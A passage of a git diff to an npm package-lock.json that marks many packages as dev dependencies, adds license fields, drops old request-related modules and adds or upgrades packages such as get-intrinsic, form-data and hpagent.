"^29.6.3", "chalk": "^4.0.0", @@ -1474,6 +1619,7 @@ "version": "7.0.6", "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dev": true, "dependencies": { "path-key": "^3.1.0", "shebang-command": "^2.0.0", @@ -1483,22 +1629,11 @@ "node": ">= 8" } }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, "node_modules/debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, "dependencies": { "ms": "2.1.2" }, @@ -1515,6 +1650,7 @@ "version": "1.5.3", "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", + "dev": true, "peerDependencies": { "babel-plugin-macros": "^3.1.0" }, @@ -1528,6 +1664,7 @@ "version": "4.3.1", "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dev": true, "engines": { "node": ">=0.10.0" } @@ -1537,6 +1674,7 @@ "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "dev": true, + "license": "MIT", "engines": { "node": ">=0.4.0" } @@ -1545,6 +1683,7 @@ "version": "3.1.0", "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", + "dev": true, "engines": { "node": ">=8" } @@ -1553,24 +1692,31 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", + "dev": true, "engines": { "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", + "node_modules/dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "dev": true, + "license": "MIT", "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" + }, + "engines": { + "node": ">= 0.4" } }, "node_modules/ejs": { "version": "3.1.10", "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", + "dev": true, "dependencies": { "jake": "^10.8.5" }, @@ -1584,12 +1730,14 @@ "node_modules/electron-to-chromium": { "version": "1.5.63", "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==" + "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", + "dev": true }, "node_modules/emittery": { "version": "0.13.1", "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", + "dev": true, "engines": { "node": ">=12" }, @@ -1600,28 +1748,91 @@ "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "dev": true + }, + "node_modules/end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "dev": true, + "license": "MIT", + "dependencies": { + "once": "^1.4.0" + } }, "node_modules/error-ex": { "version": "1.3.2", "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dev": true, "dependencies": { "is-arrayish": "^0.2.1" } }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "node_modules/es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true, + "license": "MIT", "engines": { - "node": ">=6" + "node": ">= 0.4" + } + }, + "node_modules/es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, + "license": "MIT", + "dependencies": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/escalade": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true, + "engines": { + "node": ">=6" } }, "node_modules/escape-string-regexp": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "dev": true, "engines": { "node": ">=8" } @@ -1630,6 +1841,7 @@ "version": "4.0.1", "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "dev": true, "bin": { "esparse": "bin/esparse.js", "esvalidate": "bin/esvalidate.js" @@ -1642,6 +1854,7 @@ "version": "5.1.1", "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", + "dev": true, "dependencies": { "cross-spawn": "^7.0.3", "get-stream": "^6.0.0", @@ -1664,6 +1877,7 @@ "version": "0.1.2", "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", + "dev": true, "engines": { "node": ">= 0.8.0" } @@ -1672,6 +1886,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", + "dev": true, "dependencies": { "@jest/expect-utils": "^29.7.0", "jest-get-type": "^29.6.3", @@ -1683,36 +1898,24 @@ "node": "^14.15.0 || ^16.10.0 || >=18.0.0" } }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", + "node_modules/fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", "dev": true, - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "dev": true + "license": "MIT" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", + "dev": true }, "node_modules/fb-watchman": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", + "dev": true, "dependencies": { "bser": "2.1.1" } @@ -1721,14 +1924,17 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", + "dev": true, "dependencies": { "minimatch": "^5.0.1" } }, "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.2.tgz", + "integrity": "sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==", + "dev": true, + "license": "MIT", "dependencies": { "balanced-match": "^1.0.0" } @@ -1737,6 +1943,7 @@ "version": "5.1.6", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, "dependencies": { "brace-expansion": "^2.0.1" }, @@ -1748,6 +1955,7 @@ "version": "7.1.1", "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dev": true, "dependencies": { "to-regex-range": "^5.0.1" }, @@ -1759,6 +1967,7 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, "dependencies": { "locate-path": "^5.0.0", "path-exists": "^4.0.0" @@ -1767,68 +1976,34 @@ "node": ">=8" } }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "dev": true, - "engines": { - "node": "*" - } - }, "node_modules/form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "dev": true, + "license": "MIT", "dependencies": { "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", "mime-types": "^2.1.12" }, "engines": { - "node": ">= 0.12" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs-minipass/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" + "node": ">= 6" } }, - "node_modules/fs-minipass/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "dev": true }, "node_modules/fsevents": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dev": true, "hasInstallScript": true, "optional": true, "os": [ @@ -1842,6 +2017,7 @@ "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true, "funding": { "url": "https://github.com/sponsors/ljharb" } @@ -1850,6 +2026,7 @@ "version": "1.0.0-beta.2", "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true, "engines": { "node": ">=6.9.0" } @@ -1858,22 +2035,64 @@ "version": "2.0.5", "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "dev": true, "engines": { "node": "6.* || 8.* || >= 10.*" } }, + "node_modules/get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/get-package-type": { "version": "0.1.0", "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "dev": true, "engines": { "node": ">=8.0.0" } }, + "node_modules/get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dev": true, + "license": "MIT", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, "node_modules/get-stream": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "dev": true, "engines": { "node": ">=10" }, @@ -1881,19 +2100,11 @@ "url": "https://github.com/sponsors/sindresorhus" } }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - } - }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "dev": true, "dependencies": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -1913,50 +2124,73 @@ "version": "11.12.0", "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "dev": true, "engines": { "node": ">=4" } }, + "node_modules/gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/graceful-fs": { "version": "4.2.11", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", + "node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", "dev": true, "engines": { - "node": ">=4" + "node": ">=8" } }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", + "node_modules/has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dev": true, - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, + "license": "MIT", "engines": { - "node": ">=6" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "node_modules/has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", + "dev": true, + "license": "MIT", + "dependencies": { + "has-symbols": "^1.0.3" + }, "engines": { - "node": ">=8" + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" } }, "node_modules/hasown": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, "dependencies": { "function-bind": "^1.1.2" }, @@ -1964,30 +2198,27 @@ "node": ">= 0.4" } }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==" - }, - "node_modules/http-signature": { + "node_modules/hpagent": { "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", "dev": true, - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, + "license": "MIT", "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" + "node": ">=14" } }, + "node_modules/html-escaper": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", + "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "dev": true + }, "node_modules/human-signals": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", + "dev": true, "engines": { "node": ">=10.17.0" } @@ -1996,6 +2227,7 @@ "version": "3.2.0", "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.2.0.tgz", "integrity": 